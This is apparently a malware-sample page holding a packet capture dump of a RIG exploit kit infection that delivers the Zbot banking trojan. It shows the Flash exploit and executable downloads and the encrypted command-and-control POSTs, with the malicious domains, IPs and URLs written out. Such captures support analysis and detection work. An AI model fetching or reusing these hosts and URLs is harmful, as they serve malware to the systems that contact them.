RIG Exploit Kit Zbot Banking Trojan Malware Traffic Sample PCAP file download

2016-06-23 20:06:29.966522 IP 192.168.2.187.49207 > 46.30.46.170.80: Flags [P.], seq 474:1160, ack 3301, win 16387, length 686: HTTP: GET /index.php?wXqBcrWVKhnGD4E=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7cSSR-Qy0Vr9muAVdZgvwkfU4TcCyr9LA1kQ5l8Wza-eBKqKp0N6RgBnEB_CbJQlqw-BF3H6PXl5gv2pHn4oieWX_P5xl9o HTTP/1.1
E…..@…._………7.P…2u..fP.@.”8..GET /index.php?wXqBcrWVKhnGD4E=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7cSSR-Qy0Vr9muAVdZgvwkfU4TcCyr9LA1kQ5l8Wza-eBKqKp0N6RgBnEB_CbJQlqw-BF3H6PXl5gv2pHn4oieWX_P5xl9o HTTP/1.1
Accept: */*
Referer: http://cv.sertomaartscenter.com/?wXqBcrWVKhnGD4E=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7cSSR-Qy0Vr9muAVdZgvwkfU4TcCyr9LA1kQ5l8Wza-eBKqE
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: cv.sertomaartscenter.com
Connection: Keep-Alive

2016-06-23 20:06:30.300453 IP 46.30.46.170.80 > 192.168.2.187.49207: Flags [.], ack 1160, win 34, length 0
E..(F6@.3..n………P.7u..f….P..”….
2016-06-23 20:06:30.581358 IP 46.30.46.170.80 > 192.168.2.187.49207: Flags [.], seq 3301:4651, ack 1160, win 34, length 1350: HTTP: HTTP/1.1 200 OK
E..nF7@.3..’………P.7u..f….P..”.d..HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Fri, 24 Jun 2016 00:06:36 GMT
Content-Type: application/x-shockwave-flash
Content-Length: 21772
Connection: keep-alive

2016-06-23 20:06:31.242193 IP 192.168.2.187.49206 > 46.30.46.170.80: Flags [P.], seq 1:454, ack 1, win 16537, length 453: HTTP: GET /index.php?wXqBcrWVKhnGD4E=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7cSSR-Qy0Vr9muAVdZgvwkfU4TcCyr9LA1kQ5l8Wza-eBKqKp0N6RgBnEB_CbJQlqw-fECT6PXl5gv2pHn4oieWX_PBynpMu3lM&dfgsdf=240 HTTP/1.1
E…..@….*………6.P…G…iP.@.:…GET /index.php?wXqBcrWVKhnGD4E=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7cSSR-Qy0Vr9muAVdZgvwkfU4TcCyr9LA1kQ5l8Wza-eBKqKp0N6RgBnEB_CbJQlqw-fECT6PXl5gv2pHn4oieWX_PBynpMu3lM&dfgsdf=240 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: cv.sertomaartscenter.com
Connection: Keep-Alive

2016-06-23 20:06:31.644293 IP 46.30.46.170.80 > 192.168.2.187.49206: Flags [.], ack 454, win 31, length 0
E..(i~@.3..&………P.6…i….P….G..
2016-06-23 20:06:35.628260 IP 46.30.46.170.80 > 192.168.2.187.49206: Flags [.], seq 1:1351, ack 454, win 31, length 1350: HTTP: HTTP/1.1 200 OK
E..ni.@.3…………P.6…i….P….!..HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Fri, 24 Jun 2016 00:06:41 GMT
Content-Type: application/x-msdownload
Content-Length: 603136
Connection: keep-alive
Accept-Ranges: bytes

 

2016-06-23 20:07:52.386490 IP 192.168.2.187.49221 > 115.28.36.224.80: Flags [P.], seq 1:414, ack 1, win 16537, length 413: HTTP: GET /copyright/files/c.c HTTP/1.1
E…..@………s.$..E.P…..9..P.@..I..GET /copyright/files/c.c HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://cv.sertomaartscenter.com/index.php?wXqBcrWVKhnGD4E=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPV
x-flash-version: 19,0,0,245
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: www.doswf.com
Connection: Keep-Alive

2016-06-23 20:07:52.767296 IP 115.28.36.224.80 > 192.168.2.187.49221: Flags [.], ack 414, win 980, length 0
E..(..@.1…s.$……P.E.9……P…….
2016-06-23 20:07:52.974763 IP 115.28.36.224.80 > 192.168.2.187.49221: Flags [P.], seq 1:281, ack 414, win 980, length 280: HTTP: HTTP/1.1 404 Not Found
E..@..@.1…s.$……P.E.9……P…….HTTP/1.1 404 Not Found
Server: nginx/1.1.19
Date: Fri, 24 Jun 2016 00:07:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.18
Content-Encoding: gzip

2d
…………W..+(-QH..IU(.HM.L.LM…..Dd…..
0

2016-06-23 20:09:34.761327 IP 192.168.2.187.49230 > 185.127.25.247.80: Flags [P.], seq 1:609, ack 1, win 16537, length 608: HTTP: POST /forum/visitcounter.php HTTP/1.1
E…..@…Z……….N.Py…….P.@…..POST /forum/visitcounter.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: specialbissnes.site
Content-Length: 370
Connection: Keep-Alive
Cache-Control: no-cache

%…..W………1……j…./.SW….;.(..Z#W@..N.{.%w2.a….h.h…_..[[…@Y..1………….[J……..M;4.b…O.|…zK..6$.S.o.F..6…..6.A`.7.D+…..QTp`…[.’..R5..g
…..~..D.
UU.j[.{gO.qK.z…>.:.u.d…D.?.H……TG.^..rj…….t…0Z….\hW.W..is&..7].”~.Q..=.)………@..mu.1..=`.(
..>…….
….$….=..&…         ..rCub….%……L..i……………….p…8*.7.I.8
2016-06-23 20:09:35.067774 IP 185.127.25.247.80 > 192.168.2.187.49230: Flags [.], ack 1, win 8205, length 0
E..(()@.q.J……….P.N….y…P. .l~..
2016-06-23 20:09:35.388710 IP 185.127.25.247.80 > 192.168.2.187.49230: Flags [.], ack 609, win 8195, length 0
E..( .@.q.R`………P.N….y…P. .j(..
2016-06-23 20:09:35.388830 IP 185.127.25.247.80 > 192.168.2.187.49230: Flags [P.], seq 1:392, ack 609, win 8205, length 391: HTTP: HTTP/1.1 301 Moved Permanently
E…}.@.q…………P.N….y…P. ..m..HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Fri, 24 Jun 2016 00:09:41 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: https://185.127.25.247/forum/visitcounter.php

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor=”white”>
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>

2016-06-23 20:09:35.389125 IP 192.168.2.187.49230 > 185.127.25.247.80: Flags [.], ack 392, win 16439, length 0
E..(..@…]?………N.Py…….P.@7Hm……..
2016-06-23 20:09:43.839719 IP 192.168.2.187.49230 > 185.127.25.247.80: Flags [P.], seq 609:1217, ack 392, win 16439, length 608: HTTP: POST /forum/visitcounter.php HTTP/1.1
E…..@…Z……….N.Py…….P.@7….POST /forum/visitcounter.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: specialbissnes.site
Content-Length: 370
Connection: Keep-Alive
Cache-Control: no-cache

 

2016-06-23 20:09:46.767834 IP 192.168.2.187.49234 > 95.163.127.184.80: Flags [P.], seq 1:203, ack 1, win 16537, length 202: HTTP: GET /forum/js/d.dat HTTP/1.1
E…..@…Ps…._….R.P.a……P.@…..GET /forum/js/d.dat HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: specanomirasa.site
Cache-Control: no-cache

2016-06-23 20:09:47.154685 IP 95.163.127.184.80 > 192.168.2.187.49234: Flags [.], ack 203, win 473, length 0
E..(..@.4..!_……..P.R…..a.oP…….
2016-06-23 20:09:47.249141 IP 95.163.127.184.80 > 192.168.2.187.49234: Flags [.], seq 1:1351, ack 203, win 473, length 1350: HTTP: HTTP/1.1 200 OK
E..n..@.4…_……..P.R…..a.oP….z..HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Fri, 24 Jun 2016 00:09:53 GMT
Content-Type: application/x-ns-proxy-autoconfig
Content-Length: 54668
Connection: close
Last-Modified: Mon, 21 Mar 2016 10:53:03 GMT
ETag: “32c0bbf-d58c-52e8ce69e81c0”
Accept-Ranges: bytes

Leave a Reply